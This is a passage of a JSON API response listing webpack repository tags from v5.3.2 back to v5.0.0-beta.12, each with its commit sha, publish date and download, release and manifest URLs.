osyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-be